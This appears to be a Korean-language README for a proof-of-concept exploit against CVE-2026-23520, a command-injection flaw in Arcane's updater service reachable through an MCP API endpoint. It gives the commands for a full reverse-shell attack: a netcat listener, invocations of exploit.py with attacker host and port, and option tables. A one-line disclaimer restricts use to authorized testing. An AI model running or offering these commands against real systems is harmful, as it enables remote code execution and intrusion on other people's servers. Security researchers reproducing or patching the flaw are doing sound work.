
CVE-2026-23520에 대한 개념 증명 익스플로잇으로, Arcane의 업데이터 서비스에 존재하는 명령 주입 취약점으로, 조작된 API 요청을 통해 원격 코드 실행을 가능하게 합니다.
이 저장소는 취약한 MCP API 엔드포인트(일반적으로 /api/mcp/connect)를 노출하는 애플리케이션에 영향을 미치는 원격 명령 실행(RCE) 취약점에 대한 PoC(개념 증명) 익스플로잇을 포함합니다.
이 취약점은 조작된 API 요청을 통해 시스템 수준 명령을 실행할 수 있게 합니다.
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| 인자 | 설명 |
|---|---|
| target | 대상 IP, 도메인 또는 URL |
| --lhost | 공격자 IP |
| --lport | 공격자 포트 |
| 플래그 | 설명 |
|---|---|
| -p, --port | 대상 포트(기본값: 443) |
| -s, --scheme | http 또는 https(기본값: https) |
| -e, --endpoint | API 엔드포인트 경로 |
| -t, --timeout | 요청 타임아웃 |
| -v, --verbose | 디버그 출력 |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash가 사용 가능하다고 가정합니다.승인된 테스트 및 교육 목적으로만 사용하세요.
Parosh B